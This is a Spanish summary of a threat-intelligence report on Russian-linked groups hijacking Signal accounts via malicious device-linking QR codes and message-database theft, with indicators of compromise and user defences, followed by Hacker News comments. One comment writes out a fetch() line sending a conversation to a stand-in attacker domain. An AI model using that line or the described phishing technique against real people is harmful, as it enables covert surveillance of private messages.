- Las cuentas de Signal usadas por personas de interés para los servicios de inteligencia rusos se están convirtiendo en un objetivo prioritario, y aumentan los intentos de comprometer cuentas para acceder a comunicaciones sensibles de gobierno y del ámbito militar
- La táctica más extendida consiste en abusar de la función legítima Linked Devices para hacer que la víctima escanee un código QR malicioso y luego sincronizar los mensajes en tiempo real con el dispositivo del atacante
- UNC5792 usa invitaciones falsas a grupos de Signal, UNC4221 emplea kits de phishing con temática de Kropyva y falsas alertas de seguridad, y APT44 busca el vínculo de dispositivos mediante acceso a equipos capturados
- APT44, Turla y UNC1151 vinculado con Bielorrusia también operan capacidades para robar la base de datos de Signal o los mensajes y archivos adjuntos de Signal Desktop en entornos Android y Windows
- No es un problema limitado a Signal: WhatsApp y Telegram también están siendo atacados de forma similar, por lo que conviene actualizar las apps, revisar los dispositivos vinculados, tener cuidado con los códigos QR y usar un bloqueo de pantalla fuerte
Actividad vinculada a Rusia que apunta a cuentas de Signal
- Google Threat Intelligence Group (GTIG) confirmó que varios actores de amenazas vinculados al Estado ruso están incrementando los intentos de comprometer cuentas de Signal Messenger
- Los principales objetivos son personas de interés para los servicios de inteligencia rusos, y desde la reinvasión de Ucrania la demanda en tiempos de guerra por acceder a comunicaciones sensibles de gobierno y del ámbito militar ha impulsado esta actividad
- Signal es un mensajero seguro usado por militares, políticos, periodistas, activistas y comunidades de alto riesgo, por lo que se convierte en un objetivo de alto valor para vigilancia y espionaje
- Amenazas similares también se extienden a otros mensajeros populares como WhatsApp y Telegram, donde grupos vinculados a Rusia aplican técnicas parecidas
- Las versiones más recientes de Android y iOS de Signal incluyen funciones reforzadas para ayudar a defenderse de campañas de phishing similares
- Los usuarios deben actualizar a la versión más reciente para poder usar esas funciones
Cómo se abusa de la función Linked Devices
- La técnica más nueva y extendida consiste en abusar de la función legítima linked devices de Signal
- Para usar Signal en varios dispositivos al mismo tiempo, normalmente se requiere escanear un código QR al vincular un dispositivo adicional
- Los actores de amenazas crean códigos QR maliciosos que, cuando la víctima los escanea, vinculan una instancia de Signal controlada por el atacante con la cuenta de la víctima
- Si el vínculo se completa con éxito, los mensajes posteriores se sincronizan en tiempo real tanto con la víctima como con el atacante, lo que permite seguir espiando conversaciones seguras sin comprometer por completo el dispositivo
- En el phishing remoto, los códigos QR maliciosos suelen disfrazarse como lo siguiente
- Invitaciones a grupos de Signal
- Alertas de seguridad
- Instrucciones legítimas del sitio web de Signal para emparejar dispositivos
- En campañas de phishing remoto más personalizadas, el código QR malicioso de vinculación de dispositivo se inserta en páginas de phishing que parecen aplicaciones especializadas usadas por el ejército ucraniano
- El mismo método también se usa en operaciones de acceso cercano
- APT44 permite que fuerzas rusas desplegadas en el campo de batalla vinculen cuentas de Signal de dispositivos capturados con infraestructura controlada por el atacante para explotarlas después
- El compromiso de cuentas mediante dispositivos recién vinculados suele ser una vía inicial de bajo ruido porque hay poca detección y defensa técnica centralizada
- Si tiene éxito, existe un alto riesgo de que la intrusión pase desapercibida durante mucho tiempo
UNC5792: invitaciones a grupos de Signal manipuladas
- UNC5792 es un clúster sospechoso de actividad de inteligencia rusa y coincide parcialmente con UAC-0195 de CERT-UA
- Este grupo manipula la página legítima de group invite de Signal para usarla en campañas de phishing
- En el flujo normal, redirige al usuario a un grupo de Signal, pero la página manipulada lo envía a una URL maliciosa que vincula un dispositivo controlado por el atacante con la cuenta de Signal de la víctima
- La infraestructura controlada por el atacante está diseñada para parecer una invitación legítima a un grupo de Signal
- El JavaScript de la invitación falsa sustituye la redirección normal para unirse a un grupo de Signal por un bloque malicioso que incluye un URI de vinculación de nuevo dispositivo de Signal con formato
sgnl://linkdevice?uuid= - Se identificó como dominio de ejemplo
signal-groups[.]tech
UNC4221: kit personalizado de phishing para Signal
- UNC4221 es un actor de amenazas vinculado a Rusia al que CERT-UA sigue como UAC-0185, y apunta activamente a cuentas de Signal usadas por militares ucranianos
- Este grupo opera un kit personalizado de phishing para Signal que aparenta ser un componente de la aplicación Kropyva, usada por el ejército ucraniano para guiado de artillería
- Al igual que UNC5792, UNC4221 oculta la función de vinculación de dispositivos detrás de lo que parece ser una invitación a un grupo de Signal enviada por un contacto de confianza
- Las variantes observadas del kit de phishing toman varias formas
- Sitios web de phishing que redirigen a la víctima a una infraestructura secundaria que aparenta ser una guía legítima de vinculación de dispositivos provista por Signal
- Sitios web con el kit de phishing base temático de Kropyva que insertan directamente un código QR malicioso de vinculación de dispositivo
- Páginas de phishing de operaciones tempranas en 2022 diseñadas para parecer alertas de seguridad legítimas de Signal
- Entre los dominios y páginas de ejemplo están
signal-confirm[.]site,teneta.add-group[.]siteysignal-protect[.]host - UNC4221 también usa un payload liviano de JavaScript llamado PINPOINT como componente clave de su operación contra Signal
- PINPOINT recopila información básica del usuario y datos de ubicación mediante la API GeoLocation del navegador
- En operaciones futuras similares, es probable que los mensajes seguros y los datos de ubicación sean objetivos simultáneos
- Esto es especialmente relevante en contextos de vigilancia dirigida o de apoyo a operaciones militares convencionales
Actividad vinculada a Rusia y Bielorrusia para robar mensajes de Signal
- Además de vincular dispositivos adicionales a la cuenta de la víctima, varios actores regionales de amenazas conocidos operan capacidades para robar archivos de base de datos de Signal en dispositivos Android y Windows
- APT44 usa un script liviano de Windows Batch llamado WAVESIGN
- Consulta periódicamente mensajes de Signal desde la base de datos de Signal de la víctima
- Exfiltra mensajes recientes mediante Rclone
- El malware Android Infamous Chisel, atribuido a Sandworm y reportado en 2023 por el Security Service of Ukraine (SSU) de Ucrania y el National Cyber Security Centre (NCSC) del Reino Unido
- Está diseñado para buscar de forma recursiva listas de extensiones de archivo, incluidas bases de datos locales de varias apps de mensajería como Signal, en dispositivos Android
- Turla es un actor de amenazas ruso atribuido al Centro 16 del FSB ruso
- Opera scripts livianos de PowerShell para preparar la exfiltración de mensajes de Signal Desktop en entornos Windows tras una intrusión
- UNC1151, vinculado con Bielorrusia, usa la utilidad de línea de comandos Robocopy
- Prepara para exfiltración posterior el contenido del directorio de archivos donde Signal Desktop guarda mensajes y archivos adjuntos
Medidas de defensa para usuarios de mensajería segura
- El fuerte enfoque de varios actores de amenazas en Signal muestra que las amenazas contra aplicaciones de mensajería segura podrían intensificarse en el corto plazo
- Junto con el crecimiento de la industria del spyware comercial y el aumento de variantes de malware móvil usadas en zonas de conflicto, está creciendo la demanda de capacidades cibernéticas ofensivas para vigilar comunicaciones sensibles
- La amenaza no se limita a operaciones cibernéticas remotas como phishing y entrega de malware
- Las operaciones de acceso cercano, en las que un atacante puede acceder brevemente a un dispositivo desbloqueado del objetivo, también representan un riesgo importante
- Además de Signal, WhatsApp y Telegram están entre las prioridades recientes de ataque de varios grupos vinculados a Rusia
- Microsoft Threat Intelligence abordó en una entrada reciente del blog campañas en las que COLDRIVER, UNC4057 y Star Blizzard intentaron abusar de la función Linked Devices para comprometer cuentas de WhatsApp
- Los usuarios que podrían ser objetivo de operaciones de intrusión respaldadas por gobiernos deberían adoptar los siguientes hábitos de defensa
- Activar el bloqueo de pantalla en todos los dispositivos móviles y usar contraseñas largas y complejas que mezclen mayúsculas, minúsculas, números y símbolos
- Android admite contraseñas alfanuméricas, que ofrecen mucha más seguridad que un PIN numérico o un patrón
- Instalar las actualizaciones del sistema operativo lo antes posible y mantener siempre Signal y otras apps de mensajería en su versión más reciente
- Mantener activado Google Play Protect, que viene habilitado por defecto en dispositivos Android con Google Play Services
- Revisar periódicamente la sección “Linked devices” en la configuración de la app para detectar dispositivos no autorizados
- Tener cuidado con códigos QR y recursos web que parezcan actualizaciones de software, invitaciones a grupos u otras alertas que impulsen una acción inmediata
- Cuando sea posible, usar verificación en dos pasos con huella digital, reconocimiento facial, llave de seguridad o códigos de un solo uso para validar inicios de sesión o la vinculación de nuevos dispositivos
- Los usuarios de iPhone preocupados por vigilancia dirigida o espionaje deberían considerar activar Lockdown Mode para reducir la superficie de ataque
Resumen de indicadores de compromiso y técnicas observadas
- Para ayudar en labores de hunting e identificación dentro de las organizaciones, se incluyen indicadores de compromiso en la GTI Collection para usuarios registrados
- Algunos ejemplos de indicadores de compromiso relacionados son los siguientes
- UNC5792:
e078778b62796bab2d7ab2b04d6b01bf, ejemplo de código HTML de invitación a grupo manipulada - Páginas falsas de phishing de invitación a grupo de UNC5792:
add-signal-group[.]com,add-signal-groups[.]com,group-signal[.]com,groups-signal[.]site,signal-device-off[.]online,signal-group-add[.]com,signal-group[.]site,signal-group[.]tech,signal-groups-add[.]com,signal-groups[.]site,signal-groups[.]tech,signal-security[.]online,signal-security[.]site,signalgroup[.]site,signals-group[.]com - Páginas de phishing de guía de vinculación de dispositivo de UNC4221:
signal-confirm[.]site,confirm-signal[.]site - Falsa alerta de seguridad de Signal de UNC4221:
signal-protect[.]host - Falsas invitaciones a grupo de Kropyva de UNC4221:
teneta.join-group[.]online,teneta.add-group[.]site,group-teneta[.]online,helperanalytics[.]ru,teneta[.]group,group.kropyva[.]site - APT44:
150.107.31[.]194:18000, código QR de vinculación de dispositivo generado dinámicamente y entregado por APT44 - Script Batch WAVESIGN de APT44:
a97a28276e4f88134561d938f60db495,b379d8f583112cad3cf60f95ab3a67fd,b27ff24870d93d651ee1d8e06276fa98
- UNC5792:
- Las tácticas y técnicas observadas por actor de amenazas son las siguientes
- UNC5792: phishing remoto con invitaciones falsas a grupos para emparejar los mensajes de Signal de la víctima con un dispositivo controlado por el atacante
- UNC4221: phishing remoto con falsas aplicaciones web militares y alertas de seguridad para emparejar los mensajes de Signal de la víctima con un dispositivo controlado por el atacante
- APT44: abuso de dispositivos con acceso físico para emparejar los mensajes de Signal de la víctima con un dispositivo controlado por el atacante
- APT44: uso del malware Android Infamous Chisel para buscar exfiltrar archivos de base de datos de Signal
- APT44: exfiltración periódica de mensajes recientes de Signal mediante scripts Windows Batch a través de Rclone
- Turla: robo de bases de datos de Signal Desktop tras comprometer entornos Windows
- UNC1151: preparación para exfiltración de directorios de archivos de Signal Desktop con Robocopy
2 comentarios
Aunque de hecho es vulnerable, da risa que Telegram, que ni siquiera cifra correctamente los chats grupales, critique a otros en temas de seguridad.
Comentarios de Hacker News
Las apps con un flujo de trabajo de dispositivos vinculados, como Signal, son riesgosas desde hace bastante tiempo.
Cuando Telegram desacreditó a Signal el año pasado, también señaló este punto (https://news.ycombinator.com/context?id=40303736), y creo que la implementación de dispositivos vinculados de Signal tenía problemas desde hace mucho: https://eprint.iacr.org/2021/626.pdf
De hecho, sorprende que haya tardado tanto en aparecer un caso de ataque real en la literatura pública. Tampoco ayudó que Signal considerara este ataque fuera de su modelo de amenazas. Según ese paper, Signal recibió el reporte el 20 de octubre de 2020 y respondió el 28 de octubre diciendo que no incluía la comprometida de claves secretas de largo plazo en su modelo de adversario.
En ese caso, tendría que haber tenido acceso físico a uno de los dispositivos de la víctima o algún otro backdoor; con eso, parece que ya perdiste. Corríjanme si me equivoco. La seguridad física del hardware y la prevención de phishing siguen pareciendo clave.
Fuera del laboratorio, las formas de obtenerla suelen limitarse a conseguir acceso root al dispositivo del usuario o robar una copia de seguridad reciente de chats. La campaña que descubrió Google se parece más al phishing, así que técnicamente es menos grave, pero cómo advertirle al usuario que está haciendo algo riesgoso es un problema difícil que involucra toda la seguridad de usabilidad. Será un tema más importante en Signal cuando, al agregar un nuevo dispositivo vinculado, empiece a copiarse también el historial de mensajes y los adjuntos de los últimos 45 días.
Lo que últimamente siento con más fuerza es que, al final, el cifrado de extremo a extremo requiere que el usuario final pueda compilar y verificar el cliente por su cuenta.
Estoy creando un servicio de chat de IA cifrado, basado en CRDT cifrados, y basta con poner una línea de
fetcho un rastreador de analítica en la parte de renderizado para que la seguridad prometida por el protocolo quede anulada. Más aún: también hay que confiar en el sistema operativo donde se ejecuta el renderizado.Aunque hagas que el cliente sea open source y se pueda compilar de forma reproducible, tienes que distribuirlo a través de la iOS Store, y en el proceso de publicación puede pasar cualquier cosa. Pongo iOS como ejemplo porque subir apps compiladas por uno mismo es especialmente complicado. Si es un chat multipartito, la otra parte también tendría que pasar por el mismo proceso.
Aunque uses todo tipo de protocolos sofisticados y el mejor cifrado en tránsito, al final todo es una cuestión de confianza. Me preocupa que, al usar algo como Signal, uno se convierta más bien en objetivo de vigilancia bajo la ilusión de estar en un entorno completamente seguro. Si una agencia gubernamental quisiera vigilar, probablemente concentraría sus recursos en los usuarios de Signal, que son quienes más cosas tendrían que ocultar.
A veces siento que todo es inútil salvo el almacenamiento cifrado. También me resulta extraño que la mayor parte de la discusión se quede en la validez de protocolos de seguridad centrados en matemáticas. Si en la capa de renderizado una sola línea como
fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>)", {body: JSON.stringify(convo)})puede saltárselo todo, me interesa saber qué piensan al respecto.Eliminar la confianza parece imposible; solo la trasladamos o la escondemos detrás de una abstracción. Lo que será más importante en adelante son mecanismos que permitan demostrar con claridad que una entidad en la que se confió hasta cierto punto actuó de forma maliciosa y hacerla responsable.
Por ejemplo, logs de transparencia de certificados para evitar ataques de intermediario, compilaciones reproducibles para verificar que el binario recibido coincide con el código open source publicado, o transparencia de claves para confirmar que en WhatsApp/Signal/iMessage recibes la clave pública esperada y no una clave de la NSA.
Un sistema que intenta ser demasiado seguro puede terminar impidiendo que el usuario lea sus propios mensajes y empujarlo a un sistema menos seguro. En Matrix también hubo problemas porque el cliente no avisaba con suficiente claridad que, si cerrabas sesión, podías perder mensajes de forma permanente.
Algunos requisitos fuertes, como la confidencialidad directa perfecta, pueden chocar en la práctica con lo que los usuarios quieren de la mensajería. Lo que el usuario quiere es: “yo puedo ver mis mensajes cuando quiera, y nadie más puede verlos jamás”, pero eso es muy difícil. Hay una tensión fundamental entre seguridad, restablecimiento de contraseñas y recuperación tras perder el teléfono.
Si la gente entendiera por completo los posibles resultados, quizá muchos no querrían el cifrado de extremo a extremo más fuerte. Tal vez preferirían garantías legales fuertes, como “si alguien ve mis mensajes, cárcel de por vida”. Hay personas que sí quieren el máximo nivel de seguridad técnica, pero si se diseña según esa prioridad, puede haber un efecto adverso para los usuarios que no aceptan esas concesiones.
Quien se preocupa por ese nivel de seguridad intentará usar algo que no sea un iPhone. Que los defensores de Signal llamen LARPers a los usuarios de criptosistemas que no les gustan parece una proyección típica. Salvo en casos como trabajar para el gobierno de Estados Unidos, no tengo muy claro cuál es el modelo de amenaza real para el que Signal encaja.
También existe claramente un efecto farola entre los investigadores académicos de criptografía, que se concentran en algoritmos matemáticos. Hoy en día el alcance de lo que puede recibir financiamiento en investigación de seguridad se ha ampliado un poco e incluye modelos de juguete de protocolos de mensajería de extremo a extremo, pero sigue siendo insuficiente para cubrir el tramo completo, de humano a humano, que realmente importa.
Básicamente, consiste en que una raíz de confianza firme y permita verificar sin dudas de qué teléfono + sistema operativo + app proviene la entidad con la que interactúas.
Android tiene esto y, por ejemplo, puede confirmar a un tercero si se está ejecutando con un bootloader bloqueado, una firma de Google y un sistema operativo de Google. En teoría, también sería posible tener otra cadena de confianza y hacer que una contraparte remota acepte software “original” como un teléfono Google + Lineage OS.
Las apps también pueden verificar la firma de la app accesible para el sistema operativo y proporcionársela a la contraparte remota si es necesario. Un artefacto de atestación completamente transparente, que no confíe ciegamente en una sola entidad como Google, podría usar un registro con los hashes y binarios de los componentes verificados, en lugar de una raíz de confianza basada en firmas.
Todo esto es técnicamente posible, pero hoy no está implementado de una forma realmente practicable. Creo que, si hay suficiente interés, terminará implementándose.
En ese entonces nada estaba cifrado, hacer cualquier cosa en una red Wi-Fi pública era prácticamente jugar a la ruleta rusa, y las agencias de inteligencia de señales vivían una edad dorada. En esa época, el cifrado de red tenía mayor prioridad.
El artículo no lo dice explícitamente, pero según entiendo, el primer paso de uno de los ataques es apoderarse del smartphone de un soldado caído.
Si tiene éxito, los mensajes posteriores se entregan en tiempo real tanto a la víctima como al atacante.
Pero un smartphone ofrece a cada soldado una potente plataforma de cómputo y comunicación que puede usarse sin entrenamiento adicional. El problema es cómo hacerla segura, incluidos los riesgos mencionados en el comentario superior.
Sospecho que alguien está investigando cómo protegerlos lo suficiente como para que ni siquiera los servicios de inteligencia rusos puedan explotarlos eficazmente. Si esas soluciones se difunden ampliamente, también podrían aplicarse bien a la privacidad civil. Proteger los teléfonos de civiles ucranianos frente a atacantes rusos tampoco es una mala idea.
Si se refieren a que basta con escanear una vez un código QR para vincular un dispositivo, me parece que eso es un agujero
No debería vincularse un dispositivo solo por escanear el código; debería haber una confirmación manual del tipo “Sí, quiero vincular este dispositivo”. Así, aunque alguien lo escanee pensando que es un código de invitación a un grupo, podría darse cuenta de que en realidad no lo es. Claro, igual depende de que el usuario lo note, pero es una mejora significativa frente a “lo escaneé pensando que era un código para unirme a un grupo y, en silencio, se vinculó otro dispositivo”
Muchos usuarios no entienden cosas como códigos QR, enlaces o vinculaciones, ni se detienen a pensarlo. Tocan según una suposición inmediata e instintiva, y a menudo hacen clic solo para quitar algo de la pantalla y volver a lo que estaban haciendo. No sé si hay base para afirmar que no existe un paso de confirmación; supongo que la documentación de Signal lo aclararía
Artículo relacionado: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
Lo vi a través de https://news.ycombinator.com/item?id=43103692, pero ahí no hay comentarios
La buena noticia es que hay una razón por la que lo están atacando. Significa que Signal todavía es efectivo
Hay muchas voces que quieren decir que Signal está comprometido, pero en casi todos los casos hay que fijarse en que esas voces son menos open source que Signal
Signal está haciendo todo lo posible por defender los derechos humanos incluso mientras se convierte en una empresa a escala web. La dignidad personal importa. No es una simple conversación
Miré rápidamente a los miembros de la junta en el sitio de Signal Foundation y vi expresiones como Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow y Foreign Affairs Policy Board del U.S. Department of State
Esa gente suena como parte del mundo de las agencias de inteligencia. Me pregunto qué hacen exactamente en la junta de Signal, una app de mensajería open source. Coincido en que no es una simple conversación
Si Signal es seguro, quienes atacan la privacidad querrán que la gente crea que Signal está comprometido y use otra cosa. Si no es seguro, querrán lo contrario: que la gente crea que Signal es seguro
Creo que la solución es ignorar por completo las posibles fuentes de desinformación, especialmente usuarios aleatorios de redes sociales. HN incluido. Es difícil cuando el centro social está en esos lugares, y hay que excluirse a uno mismo. Hay que limitarse a voces legítimas y confiables
“MongoDB es web scale. Solo lo enciendes y escala de inmediato”
En el menú de configuración se puede verificar si hay dispositivos vinculados inesperados
Bastaría con mostrar un ícono pequeño tipo “3 dispositivos vinculados activos”
Proporcionaron algunos dominios, pero no todos están registrados
Por ejemplo,
signal-protect[.]hostykropyva[.]siteestán disponibles, mientras quesignal-confirm[.]siteestá registrado en Ucrania. Algunos están registrados en RusiaNo hay que confiar en ningún país en guerra, sea del bando que sea. A culpa a B y B culpa a A, pero ambos tienen su propia agenda
signal-confirm[.]siteesté registrado en Ucrania, los datos WHOIS suelen ser falsos, así que es difícil tomar eso como baseSe sabe que Rusia también usa credenciales robadas o tarjetas SIM de países vecinos, incluida Ucrania, para este tipo de cosas
Lamentablemente, los actores estatales rusos tampoco tienen problema para operar dentro de Ucrania. Si a eso se le suman delincuentes caóticos que siguen a quien les pague más, y personas que van y vienen a diario entre zonas ocupadas temporalmente por Rusia y Ucrania, la situación se complica rápido